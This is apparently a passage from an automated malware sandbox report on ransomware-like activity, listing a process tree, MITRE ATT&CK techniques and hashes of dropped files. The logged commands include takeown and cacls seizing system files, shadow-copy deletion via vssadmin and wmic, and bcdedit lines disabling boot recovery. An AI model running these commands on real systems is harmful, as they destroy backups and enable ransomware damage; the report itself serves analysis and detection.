- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\WuProvider.802cee16-994e-416e-81f5-611b64c36bf0.1.etl"
    3⤵
    - Modifies file permissions
    PID:3124
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "WuProvider.802cee16-994e-416e-81f5-611b64c36bf0.1.etl" -nobanner
    3⤵
    PID:3464
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "WuProvider.802cee16-994e-416e-81f5-611b64c36bf0.1.etl" -nobanner
      4⤵
      PID:3384
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2256
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.22186466-e1f2-40aa-80b9-db847d3fe8be.1.etl""
  2⤵
  PID:4764
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.22186466-e1f2-40aa-80b9-db847d3fe8be.1.etl" /E /G Admin:F /C
    3⤵
    PID:2568
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.22186466-e1f2-40aa-80b9-db847d3fe8be.1.etl"
    3⤵
    - Modifies file permissions
    PID:2308
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "MoUsoCoreWorker.22186466-e1f2-40aa-80b9-db847d3fe8be.1.etl" -nobanner
    3⤵
    PID:5112
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "MoUsoCoreWorker.22186466-e1f2-40aa-80b9-db847d3fe8be.1.etl" -nobanner
      4⤵
      PID:2264
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4796
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files (x86)\Windows Mail\wab.exe""
  2⤵
  PID:1604
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\wab.exe" /E /G Admin:F /C
    3⤵
    PID:2592
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\wab.exe"
    3⤵
    - Modifies file permissions
    PID:2728
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "wab.exe" -nobanner
    3⤵
    PID:3652
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "wab.exe" -nobanner
      4⤵
      PID:2940
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1488
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui""
  2⤵
  PID:4408
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4240
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:4560
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:1408
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:4284
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2292
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui""
  2⤵
  PID:2920
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4600
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui"
    3⤵
    PID:2780
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:3096
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:1260
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3948
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.07b9dbfa-9ac0-468e-beea-f2d565776db2.1.etl""
  2⤵
  PID:2336
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.07b9dbfa-9ac0-468e-beea-f2d565776db2.1.etl" /E /G Admin:F /C
    3⤵
    PID:4620
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.07b9dbfa-9ac0-468e-beea-f2d565776db2.1.etl"
    3⤵
    - Modifies file permissions
    PID:1224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "MoUsoCoreWorker.07b9dbfa-9ac0-468e-beea-f2d565776db2.1.etl" -nobanner
    3⤵
    PID:4172
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "MoUsoCoreWorker.07b9dbfa-9ac0-468e-beea-f2d565776db2.1.etl" -nobanner
      4⤵
      PID:4640
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4236
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""
  2⤵
  PID:4584
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C
    3⤵
    PID:3768
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"
    3⤵
    PID:3060
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "watermark.png" -nobanner
    3⤵
    PID:1280
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "watermark.png" -nobanner
      4⤵
      PID:344
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3376
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1""
  2⤵
  PID:4360
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1" /E /G Admin:F /C
    3⤵
    PID:3340
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1"
    3⤵
    - Modifies file permissions
    PID:2360
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner
    3⤵
    PID:1884
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner
      4⤵
      PID:3912
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4456
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Users\All Users\USOShared\Logs\System\NotificationUxBroker.f514204f-d859-4c91-ba1b-f89b894b3e39.1.etl""
  2⤵
  PID:384
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\NotificationUxBroker.f514204f-d859-4c91-ba1b-f89b894b3e39.1.etl" /E /G Admin:F /C
    3⤵
    PID:4888
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\NotificationUxBroker.f514204f-d859-4c91-ba1b-f89b894b3e39.1.etl"
    3⤵
    - Modifies file permissions
    PID:4884
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "NotificationUxBroker.f514204f-d859-4c91-ba1b-f89b894b3e39.1.etl" -nobanner
    3⤵
    PID:1452
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "NotificationUxBroker.f514204f-d859-4c91-ba1b-f89b894b3e39.1.etl" -nobanner
      4⤵
      PID:4368
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4388
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin""
  2⤵
  PID:4352
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin" /E /G Admin:F /C
    3⤵
    PID:1712
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin"
    3⤵
    PID:3020
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "TileCache_100_0_Data.bin" -nobanner
    3⤵
    PID:4184
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "TileCache_100_0_Data.bin" -nobanner
      4⤵
      PID:3240
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3508
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""
  2⤵
  PID:2008
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C
    3⤵
    PID:1820
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"
    3⤵
    - Modifies file permissions
    PID:1544
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "overlay.png" -nobanner
    3⤵
    PID:4916
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "overlay.png" -nobanner
      4⤵
      PID:2160
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2268
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files (x86)\Windows Mail\wabmig.exe""
  2⤵
  PID:2896
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\wabmig.exe" /E /G Admin:F /C
    3⤵
    PID:4720
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\wabmig.exe"
    3⤵
    PID:1744
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "wabmig.exe" -nobanner
    3⤵
    PID:288
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "wabmig.exe" -nobanner
      4⤵
      PID:3168
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1604
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui""
  2⤵
  PID:276
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1564
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:4284
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:2116
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:2416
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4408
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.22186466-e1f2-40aa-80b9-db847d3fe8be.1.etl""
  2⤵
  PID:3644
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.22186466-e1f2-40aa-80b9-db847d3fe8be.1.etl" /E /G Admin:F /C
    3⤵
    PID:4524
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.22186466-e1f2-40aa-80b9-db847d3fe8be.1.etl"
    3⤵
    PID:2524
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "MoUsoCoreWorker.22186466-e1f2-40aa-80b9-db847d3fe8be.1.etl" -nobanner
    3⤵
    PID:1788
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "MoUsoCoreWorker.22186466-e1f2-40aa-80b9-db847d3fe8be.1.etl" -nobanner
      4⤵
      PID:3500
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2920
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.07b9dbfa-9ac0-468e-beea-f2d565776db2.1.etl""
  2⤵
  PID:3948
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.07b9dbfa-9ac0-468e-beea-f2d565776db2.1.etl" /E /G Admin:F /C
    3⤵
    PID:3664
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.07b9dbfa-9ac0-468e-beea-f2d565776db2.1.etl"
    3⤵
    - Modifies file permissions
    PID:2980
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "MoUsoCoreWorker.07b9dbfa-9ac0-468e-beea-f2d565776db2.1.etl" -nobanner
    3⤵
    PID:1644
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "MoUsoCoreWorker.07b9dbfa-9ac0-468e-beea-f2d565776db2.1.etl" -nobanner
      4⤵
      PID:4424
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3452
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd""
  2⤵
  PID:4876
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd" /E /G Admin:F /C
    3⤵
    PID:4032
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd"
    3⤵
    - Modifies file permissions
    PID:224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner
    3⤵
    PID:4392
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner
      4⤵
      PID:4584
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4440
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.d91e48b2-65a9-48ba-85ad-a662e059bdb0.1.etl""
  2⤵
  PID:3444
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.d91e48b2-65a9-48ba-85ad-a662e059bdb0.1.etl" /E /G Admin:F /C
    3⤵
    PID:3704
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.d91e48b2-65a9-48ba-85ad-a662e059bdb0.1.etl"
    3⤵
    - Modifies file permissions
    PID:1352
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "UpdateSessionOrchestration.d91e48b2-65a9-48ba-85ad-a662e059bdb0.1.etl" -nobanner
    3⤵
    PID:3536
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "UpdateSessionOrchestration.d91e48b2-65a9-48ba-85ad-a662e059bdb0.1.etl" -nobanner
      4⤵
      PID:4336
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4608
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd""
  2⤵
  PID:1020
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd" /E /G Admin:F /C
    3⤵
    PID:3636
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd"
    3⤵
    - Modifies file permissions
    PID:3932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner
    3⤵
    PID:4280
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner
      4⤵
      PID:3112
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4208
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.221af229-975b-4ebb-8166-a2d258b46299.1.etl""
  2⤵
  PID:4536
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.221af229-975b-4ebb-8166-a2d258b46299.1.etl" /E /G Admin:F /C
    3⤵
    PID:4924
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.221af229-975b-4ebb-8166-a2d258b46299.1.etl"
    3⤵
    - Modifies file permissions
    PID:1692
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "UpdateSessionOrchestration.221af229-975b-4ebb-8166-a2d258b46299.1.etl" -nobanner
    3⤵
    PID:4404
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "UpdateSessionOrchestration.221af229-975b-4ebb-8166-a2d258b46299.1.etl" -nobanner
      4⤵
      PID:1784
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:640

C:\Windows\SYSTEM32\cmd.exe
C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\b6jB6Xmr.bat"
1⤵
PID:2336
- C:\Windows\system32\vssadmin.exe
  vssadmin Delete Shadows /All /Quiet
  2⤵
  - Interacts with shadow copies
  PID:4524
- C:\Windows\System32\Wbem\WMIC.exe
  wmic SHADOWCOPY DELETE
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4236
- C:\Windows\system32\bcdedit.exe
  bcdedit /set {default} recoveryenabled No
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:4992
- C:\Windows\system32\bcdedit.exe
  bcdedit /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2844
- C:\Windows\system32\schtasks.exe
  SCHTASKS /Delete /TN DSHCA /F
  2⤵
  PID:4584

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4020

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Deletion

T1107

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
4280e36a29fa31c01e4d8b2ba726a0d8

SHA1
c485c2c9ce0a99747b18d899b71dfa9a64dabe32

SHA256
e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359

SHA512
494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
06ad34f9739c5159b4d92d702545bd49

SHA1
9152a0d4f153f3f40f7e606be75f81b582ee0c17

SHA256
474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

SHA512
c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
72bca0f21945f3f17cec23e6b15f6903

SHA1
86df0e9ed3889d5fbabd258d4aba77c86484b410

SHA256
e9ab61c621c899cad84b15f601e0addf99ab17ec6e03da47bb7c55d240425bf3

SHA512
317d5cb7ddb233ae08b2b7b7dd9f0b9b1931751284ca0eb74b93d77a6c624c87af9067936bb4015163af8438912746a8e2c315b72f8a492e36e862e9679ec0a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat

Filesize
226B

MD5
3919df131a2594ec09a99f4eae6228f7

SHA1
899e142d9f3f55ac3291ab8f062e980615244252

SHA256
e7fa87759fdee7b8cf3f284679c238f12176224b045a1e90008c6b9eadf66bae

SHA512
931d9711e43f9ef72df976c66a755c194169cbee66649e0ac977124d87fa736743268ece87b80318fb80f3872e20507d32c2d5c5fd71e16fd158478b334f1c65

Download Submit
C:\Users\Admin\AppData\Local\Temp\NWSBH3uK.exe

Filesize
1.2MB

MD5
c50c17057fc6ea67bc579196f1f73712

SHA1
44495db58fa7c94db840a3f696c8f546a5fce2d1

SHA256
67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a

SHA512
7c5eb6317b0a51ae93302adb223d6163a5c771d5b1d8d77462c2463c37f32e0f7f957526a36e39ae5272687e4ebe2faf2d02e68601bc87afc95fc9d7145538aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\NWSBH3uK.exe

Filesize
1.2MB

MD5
c50c17057fc6ea67bc579196f1f73712

SHA1
44495db58fa7c94db840a3f696c8f546a5fce2d1

SHA256
67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a

SHA512
7c5eb6317b0a51ae93302adb223d6163a5c771d5b1d8d77462c2463c37f32e0f7f957526a36e39ae5272687e4ebe2faf2d02e68601bc87afc95fc9d7145538aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
